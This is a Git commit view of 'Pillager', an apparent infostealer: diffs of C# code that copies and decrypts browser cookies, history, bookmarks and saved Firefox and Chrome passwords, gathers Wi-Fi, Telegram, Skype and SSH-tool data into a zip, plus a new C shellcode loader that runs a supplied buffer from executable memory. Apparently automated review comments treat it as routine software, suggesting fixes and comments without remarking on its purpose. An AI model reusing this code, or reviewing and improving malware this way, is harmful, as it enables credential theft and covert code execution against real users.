3 Commits

Author SHA1 Message Date
簞純 a0b85725aa Update FireFox.cs 2023-11-07 21:21:12 +08:00
簞純 8bf0b439d2 fix bugs 2023-11-07 20:36:10 +08:00
簞純 78d97d14da Create scloader.c 2023-11-07 19:18:46 +08:00
4 changed files with 181 additions and 165 deletions


@ -222,7 +222,7 @@ namespace Pillager.Browsers
public static void Save(string path)
{
foreach (var browser in Chrome.browserOnChromium)
foreach (var browser in browserOnChromium)
{
try
{
@ -230,7 +230,7 @@ namespace Pillager.Browsers
BrowserName = browser.Key;
BrowserPath = chromepath;
MasterKey = GetMasterKey();
if (MasterKey == null) return;
if (MasterKey == null) continue;
string savepath = Path.Combine(path, BrowserName);
Directory.CreateDirectory(savepath);
string cookies = Chrome_cookies();
@ -241,9 +241,14 @@ namespace Pillager.Browsers
if (!String.IsNullOrEmpty(passwords)) File.WriteAllText(Path.Combine(savepath, BrowserName + "_passwords.txt"), passwords);
if (!String.IsNullOrEmpty(books)) File.WriteAllText(Path.Combine(savepath, BrowserName + "_books.txt"), books);
if (!String.IsNullOrEmpty(history)) File.WriteAllText(Path.Combine(savepath, BrowserName + "_history.txt"), history);
if (Directory.Exists(Path.Combine(BrowserPath, "Local Storage"))) Methods.CopyDirectory(Path.Combine(BrowserPath, "Local Storage"), Path.Combine(savepath, "Local Storage"), true);
if (Directory.Exists(Path.Combine(BrowserPath, "Local Extension Settings"))) Methods.CopyDirectory(Path.Combine(BrowserPath, "Local Extension Settings"), Path.Combine(savepath, "Local Extension Settings"), true);
if (Directory.Exists(Path.Combine(BrowserPath, "Sync Extension Settings"))) Methods.CopyDirectory(Path.Combine(BrowserPath, "Sync Extension Settings"), Path.Combine(savepath, "Sync Extension Settings"), true);
foreach (var profile in profiles)
{
Directory.CreateDirectory(Path.Combine(BrowserPath, profile));
if (Directory.Exists(Path.Combine(BrowserPath, profile+"\\Local Storage"))) Methods.CopyDirectory(Path.Combine(BrowserPath, profile + "\\Local Storage"), Path.Combine(savepath, profile + "\\Local Storage"), true);
if (Directory.Exists(Path.Combine(BrowserPath, profile+"\\Local Extension Settings"))) Methods.CopyDirectory(Path.Combine(BrowserPath, profile + "\\Local Extension Settings"), Path.Combine(savepath, profile + "\\Local Extension Settings"), true);
if (Directory.Exists(Path.Combine(BrowserPath, profile + "\\Sync Extension Settings"))) Methods.CopyDirectory(Path.Combine(BrowserPath, profile + "\\Sync Extension Settings"), Path.Combine(savepath, profile + "\\Sync Extension Settings"), true);
if (Directory.GetDirectories(Path.Combine(BrowserPath, profile)).Length == 0) Directory.Delete(Path.Combine(BrowserPath, profile));
}
}
catch { }
}
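Review bot: In the per-profile loop added to Save, `Directory.CreateDirectory(Path.Combine(BrowserPath, profile))` and the matching `Directory.Delete` act on BrowserPath, the browser's own data folder, while every copy in the same loop writes under savepath. Nothing in the change says whether touching the source tree is intended, and the effect is that a run can leave directory create and delete events inside the browser's data folder from a process that is not the browser. I would add a comment at that line naming the tree it touches, for example `// touches BrowserPath (the browser's data folder), not savepath`. `profiles` is defined outside these hunks, and the body of Save starts and ends beyond them.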


@ -19,34 +19,30 @@ namespace Pillager.Browsers
public static string FireFox_cookies()
{
StringBuilder cookies = new StringBuilder();
string firefox_cookie_path = "";
foreach (var directory in Directory.GetDirectories(BrowserPath))
{
string tmp = Path.Combine(directory, "cookies.sqlite");
if (File.Exists(tmp))
string firefox_cookie_path = Path.Combine(directory, "cookies.sqlite");
if (File.Exists(firefox_cookie_path))
{
firefox_cookie_path = tmp;
break;
try
{
string cookie_tempFile = Path.GetTempFileName();
File.Copy(firefox_cookie_path, cookie_tempFile, true);
SQLiteHandler handler = new SQLiteHandler(cookie_tempFile);
if (!handler.ReadTable("moz_cookies"))
return null;
for (int i = 0; i < handler.GetRowCount(); i++)
{
string host_key = handler.GetValue(i, "host");
string name = handler.GetValue(i, "name");
string cookie = handler.GetValue(i, "value");
cookies.AppendLine("[" + host_key + "] \t {" + name + "}={" + cookie + "}");
}
File.Delete(cookie_tempFile);
}
catch { }
}
}
if (!File.Exists(firefox_cookie_path)) return null;
try
{
string cookie_tempFile = Path.GetTempFileName();
File.Copy(firefox_cookie_path, cookie_tempFile, true);
SQLiteHandler handler = new SQLiteHandler(cookie_tempFile);
if (!handler.ReadTable("moz_cookies"))
return null;
for (int i = 0; i < handler.GetRowCount(); i++)
{
string host_key = handler.GetValue(i, "host");
string name = handler.GetValue(i, "name");
string cookie = handler.GetValue(i, "value");
cookies.AppendLine("[" + host_key + "] \t {" + name + "}={" + cookie + "}");
}
File.Delete(cookie_tempFile);
}
catch { }
}
return cookies.ToString();
}
@ -54,164 +50,153 @@ namespace Pillager.Browsers
public static string FireFox_history()
{
StringBuilder history = new StringBuilder();
string firefox_history_path = "";
foreach (var directory in Directory.GetDirectories(BrowserPath))
{
string tmp = Path.Combine(directory, "places.sqlite");
if (File.Exists(tmp))
string firefox_history_path = Path.Combine(directory, "places.sqlite");
if (File.Exists(firefox_history_path))
{
firefox_history_path = tmp;
break;
try
{
string history_tempFile = Path.GetTempFileName();
File.Copy(firefox_history_path, history_tempFile, true);
SQLiteHandler handler = new SQLiteHandler(history_tempFile);
if (!handler.ReadTable("moz_places")) return null;
for (int i = 0; i < handler.GetRowCount(); i++)
{
string url = handler.GetValue(i, "url");
history.AppendLine(url);
}
File.Delete(history_tempFile);
}
catch { }
}
}
if (!File.Exists(firefox_history_path)) return null;
try
{
string history_tempFile = Path.GetTempFileName();
File.Copy(firefox_history_path, history_tempFile, true);
SQLiteHandler handler = new SQLiteHandler(history_tempFile);
if (!handler.ReadTable("moz_places")) return null;
for (int i = 0; i < handler.GetRowCount(); i++)
{
string url = handler.GetValue(i, "url");
history.AppendLine(url);
}
File.Delete(history_tempFile);
}
catch { }
return history.ToString();
}
public static string FireFox_books()
{
StringBuilder books = new StringBuilder();
string firefox_books_path = "";
foreach (var directory in Directory.GetDirectories(BrowserPath))
{
string tmp = Path.Combine(directory, "places.sqlite");
if (File.Exists(tmp))
string firefox_books_path = Path.Combine(directory, "places.sqlite");
if (File.Exists(firefox_books_path))
{
firefox_books_path = tmp;
break;
try
{
string books_tempFile = Path.GetTempFileName();
File.Copy(firefox_books_path, books_tempFile, true);
SQLiteHandler handler = new SQLiteHandler(books_tempFile);
if (!handler.ReadTable("moz_bookmarks")) return null;
List<string> fks = new List<string>();
for (int i = 0; i < handler.GetRowCount(); i++)
{
var fk = handler.GetValue(i, "fk");
if (fk != "0")
{
fks.Add(fk);
}
}
handler = new SQLiteHandler(books_tempFile);
if (!handler.ReadTable("moz_places")) return null;
for (int i = 0; i < handler.GetRowCount(); i++)
{
var id = handler.GetRawID(i);
if (fks.Contains(id.ToString()))
{
books.AppendLine(handler.GetValue(i, "url"));
}
}
File.Delete(books_tempFile);
}
catch { }
}
}
if (!File.Exists(firefox_books_path)) return null;
try
{
string books_tempFile = Path.GetTempFileName();
File.Copy(firefox_books_path, books_tempFile, true);
SQLiteHandler handler = new SQLiteHandler(books_tempFile);
if (!handler.ReadTable("moz_bookmarks")) return null;
List<string> fks = new List<string>();
for (int i = 0; i < handler.GetRowCount(); i++)
{
var fk = handler.GetValue(i, "fk");
if (fk!="0")
{
fks.Add(fk);
}
}
handler = new SQLiteHandler(books_tempFile);
if (!handler.ReadTable("moz_places")) return null;
for (int i = 0; i < handler.GetRowCount(); i++)
{
var id = handler.GetRawID(i);
if (fks.Contains(id.ToString()))
{
books.AppendLine(handler.GetValue(i, "url"));
}
}
File.Delete(books_tempFile);
}
catch { }
return books.ToString();
}
public static string FireFox_passwords()
{
StringBuilder password = new StringBuilder();
string loginsJsonPath = "";
string keyDBPath = "";
foreach (var directory in Directory.GetDirectories(BrowserPath))
{
string tmp1 = Path.Combine(directory, "logins.json");
string tmp2 = Path.Combine(directory, "key4.db");
if (File.Exists(tmp1) && File.Exists(tmp2))
string loginsJsonPath = Path.Combine(directory, "logins.json");
string keyDBPath = Path.Combine(directory, "key4.db");
if (File.Exists(loginsJsonPath) && File.Exists(keyDBPath))
{
loginsJsonPath = tmp1;
keyDBPath = tmp2;
break;
}
}
if (!File.Exists(loginsJsonPath)|| !File.Exists(keyDBPath)) return null;
try
{
string password_keyDB_tempFile = Path.GetTempFileName();
File.Copy(keyDBPath, password_keyDB_tempFile, true);
string password_loginsJson_tempFile = Path.GetTempFileName();
File.Copy(loginsJsonPath, password_loginsJson_tempFile, true);
SQLiteHandler handler = new SQLiteHandler(password_keyDB_tempFile);
if (!handler.ReadTable("metadata")) return null;
Asn1Der asn = new Asn1Der();
for (int i = 0; i < handler.GetRowCount(); i++)
{
if (handler.GetValue(i, "id")!="password") continue;
byte[] item2Byte;
var globalSalt = Convert.FromBase64String(handler.GetValue(i, "item1"));
try
{
item2Byte = Convert.FromBase64String(handler.GetValue(i, "item2"));
}
catch
{
item2Byte = Convert.FromBase64String(handler.GetValue(i, "item2)"));
}
Asn1DerObject item2 = asn.Parse(item2Byte);
string asnString = item2.ToString();
if (asnString.Contains("2A864886F70D010C050103"))
{
var entrySalt = item2.objects[0].objects[0].objects[1].objects[0].Data;
var cipherText = item2.objects[0].objects[1].Data;
decryptMoz3DES CheckPwd = new decryptMoz3DES(cipherText, globalSalt, Encoding.ASCII.GetBytes(masterPassword), entrySalt);
var passwordCheck = CheckPwd.Compute();
string decryptedPwdChk = Encoding.GetEncoding("ISO-8859-1").GetString(passwordCheck);
if (!decryptedPwdChk.StartsWith("password-check")) return null;
}
else if (asnString.Contains("2A864886F70D01050D"))
{
var entrySalt = item2.objects[0].objects[0].objects[1].objects[0].objects[1].objects[0].Data;
var partIV = item2.objects[0].objects[0].objects[1].objects[2].objects[1].Data;
var cipherText = item2.objects[0].objects[0].objects[1].objects[3].Data;
MozillaPBE CheckPwd = new MozillaPBE(cipherText, globalSalt, Encoding.ASCII.GetBytes(masterPassword), entrySalt, partIV);
var passwordCheck = CheckPwd.Compute();
string decryptedPwdChk = Encoding.GetEncoding("ISO-8859-1").GetString(passwordCheck);
if (!decryptedPwdChk.StartsWith("password-check")) return null;
}
else return null;
try
{
handler = new SQLiteHandler(password_keyDB_tempFile);
if (!handler.ReadTable("nssPrivate")) return null;
for (int j = 0; j < handler.GetRowCount(); j++)
string password_keyDB_tempFile = Path.GetTempFileName();
File.Copy(keyDBPath, password_keyDB_tempFile, true);
string password_loginsJson_tempFile = Path.GetTempFileName();
File.Copy(loginsJsonPath, password_loginsJson_tempFile, true);
SQLiteHandler handler = new SQLiteHandler(password_keyDB_tempFile);
if (!handler.ReadTable("metadata")) return null;
Asn1Der asn = new Asn1Der();
for (int i = 0; i < handler.GetRowCount(); i++)
{
var a11Byte = Convert.FromBase64String(handler.GetValue(j, "a11"));
Asn1DerObject a11ASNValue = asn.Parse(a11Byte);
var keyEntrySalt = a11ASNValue.objects[0].objects[0].objects[1].objects[0].objects[1].objects[0].Data;
var keyPartIV = a11ASNValue.objects[0].objects[0].objects[1].objects[2].objects[1].Data;
var keyCipherText = a11ASNValue.objects[0].objects[0].objects[1].objects[3].Data;
MozillaPBE PrivKey = new MozillaPBE(keyCipherText, globalSalt, Encoding.ASCII.GetBytes(masterPassword), keyEntrySalt, keyPartIV);
var fullprivateKey = PrivKey.Compute();
byte[] privateKey = new byte[24];
Array.Copy(fullprivateKey, privateKey, privateKey.Length);
password.Append(decryptLogins(loginsJsonPath, privateKey));
if (handler.GetValue(i, "id") != "password") continue;
byte[] item2Byte;
var globalSalt = Convert.FromBase64String(handler.GetValue(i, "item1"));
try
{
item2Byte = Convert.FromBase64String(handler.GetValue(i, "item2"));
}
catch
{
item2Byte = Convert.FromBase64String(handler.GetValue(i, "item2)"));
}
Asn1DerObject item2 = asn.Parse(item2Byte);
string asnString = item2.ToString();
if (asnString.Contains("2A864886F70D010C050103"))
{
var entrySalt = item2.objects[0].objects[0].objects[1].objects[0].Data;
var cipherText = item2.objects[0].objects[1].Data;
decryptMoz3DES CheckPwd = new decryptMoz3DES(cipherText, globalSalt, Encoding.ASCII.GetBytes(masterPassword), entrySalt);
var passwordCheck = CheckPwd.Compute();
string decryptedPwdChk = Encoding.GetEncoding("ISO-8859-1").GetString(passwordCheck);
if (!decryptedPwdChk.StartsWith("password-check")) return null;
}
else if (asnString.Contains("2A864886F70D01050D"))
{
var entrySalt = item2.objects[0].objects[0].objects[1].objects[0].objects[1].objects[0].Data;
var partIV = item2.objects[0].objects[0].objects[1].objects[2].objects[1].Data;
var cipherText = item2.objects[0].objects[0].objects[1].objects[3].Data;
MozillaPBE CheckPwd = new MozillaPBE(cipherText, globalSalt, Encoding.ASCII.GetBytes(masterPassword), entrySalt, partIV);
var passwordCheck = CheckPwd.Compute();
string decryptedPwdChk = Encoding.GetEncoding("ISO-8859-1").GetString(passwordCheck);
if (!decryptedPwdChk.StartsWith("password-check")) return null;
}
else return null;
try
{
handler = new SQLiteHandler(password_keyDB_tempFile);
if (!handler.ReadTable("nssPrivate")) return null;
for (int j = 0; j < handler.GetRowCount(); j++)
{
var a11Byte = Convert.FromBase64String(handler.GetValue(j, "a11"));
Asn1DerObject a11ASNValue = asn.Parse(a11Byte);
var keyEntrySalt = a11ASNValue.objects[0].objects[0].objects[1].objects[0].objects[1].objects[0].Data;
var keyPartIV = a11ASNValue.objects[0].objects[0].objects[1].objects[2].objects[1].Data;
var keyCipherText = a11ASNValue.objects[0].objects[0].objects[1].objects[3].Data;
MozillaPBE PrivKey = new MozillaPBE(keyCipherText, globalSalt, Encoding.ASCII.GetBytes(masterPassword), keyEntrySalt, keyPartIV);
var fullprivateKey = PrivKey.Compute();
byte[] privateKey = new byte[24];
Array.Copy(fullprivateKey, privateKey, privateKey.Length);
password.Append(decryptLogins(loginsJsonPath, privateKey));
}
}
catch { }
}
File.Delete(password_keyDB_tempFile);
File.Delete(password_loginsJson_tempFile);
}
catch { }
}
File.Delete(password_keyDB_tempFile);
File.Delete(password_loginsJson_tempFile);
}
catch { }
return password.ToString();
}
@ -308,8 +293,8 @@ namespace Pillager.Browsers
if (File.Exists(Path.Combine(directory, "storage-sync-v2.sqlite")))
{
File.Copy(Path.Combine(directory, "storage-sync-v2.sqlite"), Path.Combine(savepath, "storage-sync-v2.sqlite"));
if (File.Exists(Path.Combine(directory, "storage-sync-v2..sqlite-shm")))
File.Copy(Path.Combine(directory, "storage-sync-v2..sqlite-shm"), Path.Combine(savepath, "storage-sync-v2..sqlite-shm"));
if (File.Exists(Path.Combine(directory, "storage-sync-v2.sqlite-shm")))
File.Copy(Path.Combine(directory, "storage-sync-v2.sqlite-shm"), Path.Combine(savepath, "storage-sync-v2.sqlite-shm"));
if (File.Exists(Path.Combine(directory, "storage-sync-v2.sqlite-wal")))
File.Copy(Path.Combine(directory, "storage-sync-v2.sqlite-wal"), Path.Combine(savepath, "storage-sync-v2.sqlite-wal"));
break;
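Review bot: The rewritten FireFox_cookies, FireFox_history, FireFox_books and FireFox_passwords bodies say nothing about the temporary copies they make, and every `return null` exit and every empty `catch { }` skips the `File.Delete` calls. Each profile directory that takes one of those paths leaves a copy of `cookies.sqlite`, `places.sqlite`, `key4.db` or `logins.json` behind under the name `Path.GetTempFileName()` returned, and those copies hold the same sensitive data as the originals. I would document that where the copy is made, for example `// copy of the profile DB; not removed on the return-null or exception paths`. The page has lost its +/- markers, so this reading takes the loop-wrapped version of each function as the new side.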


@ -19,6 +19,15 @@ namespace Pillager
if (File.Exists(savezippath)) File.Delete(savezippath);
Directory.CreateDirectory(savepath);
//Browsers
IE.Save(savepath);
OldSogou.Save(savepath);//SogouExplorer < 12.x
Chrome.Save(savepath);
FireFox.Save(savepath);
//Others
Wifi.Save(savepath);
//Tools
MobaXterm.Save(savepath);
Xmanager.Save(savepath);
@ -28,15 +37,6 @@ namespace Pillager
Telegram.Save(savepath);
Skype.Save(savepath);
//Browsers
IE.Save(savepath);
OldSogou.Save(savepath);//SogouExplorer < 12.x
FireFox.Save(savepath);
Chrome.Save(savepath);
//Others
Wifi.Save(savepath);
//ZIP
ZipFile.CreateFromDirectory(savepath, savezippath);
Directory.Delete(savepath, true);


@ -0,0 +1,26 @@
#include <windows.h>
#include "beacon.h"
DECLSPEC_IMPORT LPVOID WINAPI KERNEL32$VirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$WriteProcessMemory(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T * lpNumberOfBytesWritten);
DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId);
DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$GetCurrentProcess (VOID);
VOID go(
IN PCHAR Buffer,
IN ULONG Length
)
{
datap parser;
LPBYTE lpShellcodeBuffer = NULL;
DWORD dwShellcodeBufferSize = 0;
LPVOID pMem;
SIZE_T bytesWritten = 0;
DWORD dwThreadId = 0;
BeaconDataParse(&parser, Buffer, Length);
lpShellcodeBuffer = (LPBYTE) BeaconDataExtract(&parser, (int*)(&dwShellcodeBufferSize));
pMem = KERNEL32$VirtualAlloc(0, dwShellcodeBufferSize,MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
KERNEL32$WriteProcessMemory(KERNEL32$GetCurrentProcess(), pMem, lpShellcodeBuffer, dwShellcodeBufferSize, &bytesWritten);
KERNEL32$CreateThread(0, 0, pMem, 0, 0, &dwThreadId);
}
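Review bot: The new file has no header comment, and nothing in `go` says what the argument buffer holds or that it is copied into a `PAGE_EXECUTE_READWRITE` region that then becomes the start address of a new thread. Allocating writable and executable memory, writing to it, and starting a thread on it inside one process is a sequence endpoint monitoring commonly alerts on, so the file should state it plainly for anyone triaging it. I would add above `go` a comment such as `/* Entry point (beacon.h argument format): copies the packed buffer into RWX memory and runs it on a new thread. */`. The comment should also record that the return values of VirtualAlloc, WriteProcessMemory and CreateThread are all ignored.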